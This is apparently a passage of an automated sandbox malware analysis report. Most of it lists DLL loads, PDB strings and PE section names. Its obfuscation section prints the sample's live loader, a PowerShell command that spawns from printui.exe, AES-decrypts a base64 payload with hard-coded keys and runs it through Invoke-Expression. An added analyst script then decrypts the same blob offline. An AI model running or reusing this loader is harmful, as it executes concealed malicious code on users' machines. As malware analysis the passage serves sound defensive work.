Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: aepic.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ninput.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: aepic.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ninput.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: thumbcache.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.ui.fileexplorer.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cldapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: fltlib.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: uiribbon.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositoryclient.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: structuredquery.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ehstorshell.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cscui.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: networkexplorer.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mrmcorer.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositorycore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mrmdeploy.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.ui.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windowmanagementapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: inputhost.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: provsvc.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: ulib.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ifsutil.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: devobj.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ntmarta.dll
Source: C:\Windows \System32\printui.exe Section loaded: uxtheme.dll
Source: C:\Windows \System32\printui.exe Section loaded: printui.dll
Source: C:\Windows \System32\printui.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: F.7z Static file information: File size 77248657 > 1048576
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: usvc.dat.31.dr
Source: Binary string: vcruntime140d.amd64.pdb source: vcruntime140d.dll.31.dr, usvc.dat.31.dr
Source: Binary string: vcruntime140d.amd64.pdb,,, source: vcruntime140d.dll.31.dr, usvc.dat.31.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: console_zero.exe, 00000033.00000002.2226266010.00007FFA5112F000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 0000002E.00000002.2378540668.00007FFA243AB000.00000002.00000001.01000000.0000001B.sdmp, libcrypto-3-x64.dll.31.dr, usvc.dat.31.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: usvc.dat.31.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp, libpq.dll.31.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp, libpq.dll.31.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: console_zero.exe, 00000033.00000002.2226266010.00007FFA5112F000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 0000002E.00000002.2387227676.00007FFA2CEB0000.00000002.00000001.01000000.00000018.sdmp, libssl-3-x64.dll.31.dr, usvc.dat.31.dr
Source: Binary string: ucrtbased.pdb source: ucrtbased.dll.31.dr, usvc.dat.31.dr
Source: Binary string: PrintUI.pdb source: xcopy.exe, 00000019.00000002.1799318566.000001A4BEA1C000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.1832292058.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe, 0000001F.00000002.2221772024.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe.25.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 0000002E.00000002.2387227676.00007FFA2CEB0000.00000002.00000001.01000000.00000018.sdmp, libssl-3-x64.dll.31.dr, usvc.dat.31.dr
Source: Binary string: PrintUI.pdbGCTL source: xcopy.exe, 00000019.00000002.1799318566.000001A4BEA1C000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.1832292058.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe, 0000001F.00000002.2221772024.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe.25.dr

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB
Source: C:\Windows \System32\printui.exe Process created: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
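The command line above carries everything needed to recover the next stage without running it: the AES key and IV are hard-coded, and the loader never sets Mode or Padding, so it depends on the .NET Aes defaults (CBC, PKCS7). The base64 blob decodes to 144 bytes, nine AES blocks, so the decrypted command is at most 143 bytes of UTF-8. The script below is an added analyst example, not code from the report or from the sample: it reuses the recorded key, IV and ciphertext, sets the cipher mode explicitly, and writes the plaintext to a file for review instead of handing it to Invoke-Expression. The output file name decrypted_stage.ps1 is an assumption.

```powershell
# Added analyst example: offline decryption of the loader's AES-CBC payload.
# Key, IV and ciphertext are copied from the recorded command line; the
# output path is assumed. Nothing here is executed after decryption.
param(
    [string]$OutFile = (Join-Path $PWD 'decrypted_stage.ps1')   # assumed output name
)

$b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'
$key = [byte[]](0x1E,0x5B,0x26,0xF0,0x75,0x52,0xE6,0xF4,0x7D,0xBB,0x3A,0x6D,0xB0,0xE4,0x98,0xE4)
$iv  = [byte[]](0x10,0x5B,0x26,0xE1,0x75,0x51,0xE6,0xF4,0x7D,0xBB,0x3A,0x6D,0xB0,0xE1,0x88,0xFF)

$cipher = [Convert]::FromBase64String($b64)
if ($cipher.Length % 16 -ne 0) {
    throw "ciphertext length $($cipher.Length) is not a multiple of the AES block size"
}

# The loader relies on Aes.Create() defaulting to CBC/PKCS7; pin both so the
# result does not depend on the runtime's defaults.
$aes = [System.Security.Cryptography.Aes]::Create()
$aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$aes.Key = $key
$aes.IV  = $iv
$dec = $aes.CreateDecryptor()
try {
    $plain = $dec.TransformFinalBlock($cipher, 0, $cipher.Length)
} catch [System.Security.Cryptography.CryptographicException] {
    # A padding error here means the key/IV pair does not match this blob.
    throw "decryption failed (wrong key/IV or padding): $($_.Exception.Message)"
} finally {
    $dec.Dispose()
    $aes.Dispose()
}

$text = [System.Text.Encoding]::UTF8.GetString($plain)
# Never pass $text to Invoke-Expression; write it out and read it first.
[System.IO.File]::WriteAllText($OutFile, $text)
"{0} bytes of ciphertext -> {1} bytes of plaintext written to {2}" -f $cipher.Length, $plain.Length, $OutFile
"SHA256 of decrypted stage: " + (Get-FileHash -Algorithm SHA256 -LiteralPath $OutFile).Hash
```

Save it as a .ps1 and run it on an analysis machine. If the decrypted text is itself another base64/AES wrapper, feed its key, IV and blob back through the same script rather than executing it; the hash line gives you a stable indicator for the recovered stage.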
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3312B470 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,QueryPerformanceFrequency, 51_2_00007FFA3312B470
Source: x249569.dat.16.dr Static PE information: section name: _RDATA
Source: x249569.dat.16.dr Static PE information: section name: .fptable
Source: x249569.dat.26.dr Static PE information: section name: _RDATA
Source: x249569.dat.26.dr Static PE information: section name: .fptable
Source: console_zero.exe.31.dr Static PE information: section name: .fptable
Source: vcruntime140d.dll.31.dr Static PE information: section name: _RDATA
Source: libiconv-2.dll.31.dr Static PE information: section name: .xdata
Source: libiconv-2.dll.31.dr Static PE information: section name: /4
Source: libiconv-2.dll.31.dr Static PE information: section name: /19
Source: libiconv-2.dll.31.dr Static PE information: section name: /31
Source: libiconv-2.dll.31.dr Static PE information: section name: /45
Source: libiconv-2.dll.31.dr Static PE information: section name: /57
Source: libiconv-2.dll.31.dr Static PE information: section name: /70
Source: libiconv-2.dll.31.dr Static PE information: section name: /81
Source: libiconv-2.dll.31.dr Static PE information: section name: /92
Source: libintl-9.dll.31.dr Static PE information: section name: .xdata
Source: libintl-9.dll.31.dr Static PE information: section name: /4
Source: libintl-9.dll.31.dr Static PE information: section name: /19
Source: libintl-9.dll.31.dr Static PE information: section name: /31
Source: libintl-9.dll.31.dr Static PE information: section name: /45
Source: libintl-9.dll.31.dr Static PE information: section name: /57
Source: libintl-9.dll.31.dr Static PE information: section name: /70
Source: libintl-9.dll.31.dr Static PE information: section name: /81
Source: libintl-9.dll.31.dr Static PE information: section name: /92
Source: libwinpthread-1.dll.31.dr Static PE information: section name: .xdata
Source: x338625.dat.31.dr Static PE information: section name: .fptable
Source: usvc.dat.31.dr Static PE information: section name: _RDATA
Source: usvc.dat.31.dr Static PE information: section name: .fptable
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C51551B8 push es; retf 34_2_00007FF9C5158447
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5158341 push es; retf 34_2_00007FF9C5158447
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C53B46DC push ds; retf 34_2_00007FF9C53B474F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C53B7BD4 push esi; ret 34_2_00007FF9C53B7BD7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54F711E pushfd ; iretd 34_2_00007FF9C54F7121
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C54F61CC pushad ; iretd 34_2_00007FF9C54F6251
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5750080 push esp; iretd 34_2_00007FF9C5750139
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C57537F0 push eax; retf 34_2_00007FF9C5753889
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C57537EB push eax; retf 34_2_00007FF9C5753889
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C575000B push esp; iretd 34_2_00007FF9C5750139
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5753840 push eax; retf 34_2_00007FF9C5753889
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C58B612E push esp; retf 34_2_00007FF9C58B6139
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5B97050 push ebx; ret 34_2_00007FF9C5B9BE7A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5B7746E push eax; iretd 34_2_00007FF9C5B7747D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C5B77430 pushad ; iretd 34_2_00007FF9C5B7746D
Source: C:\Windows\System32\svchost.exe Code function: 46_2_649487B2 push r11; ret 46_2_649487ED
Source: C:\Windows\System32\svchost.exe Code function: 46_2_660224A8 push rax; retf 46_2_660224B1
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6829984B push 00000000h; retf 46_2_68299850
Source: C:\Windows\System32\svchost.exe Code function: 46_2_682970AC push rax; iretd 46_2_682970AD
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6829998B push 00000000h; ret 46_2_68299990
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6829999B push 00000000h; iretd 46_2_682999A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6829AA73 push 00000000h; ret 46_2_6829AA78
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6829ABBB push 00000000h; retf 46_2_6829ABC0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6829ABB3 push 00000000h; ret 46_2_6829ABB8
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6829A7AB push 00000000h; iretd 46_2_6829A7B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3C2B8 push 050001C2h; retn 0001h 46_2_00007FFA2CE3C2C5
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3C2D0 push 680001C2h; retn 0001h 46_2_00007FFA2CE3C2D5
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3C2C8 push 680001C2h; retn 0001h 46_2_00007FFA2CE3C2CD

Persistence and Installation Behavior

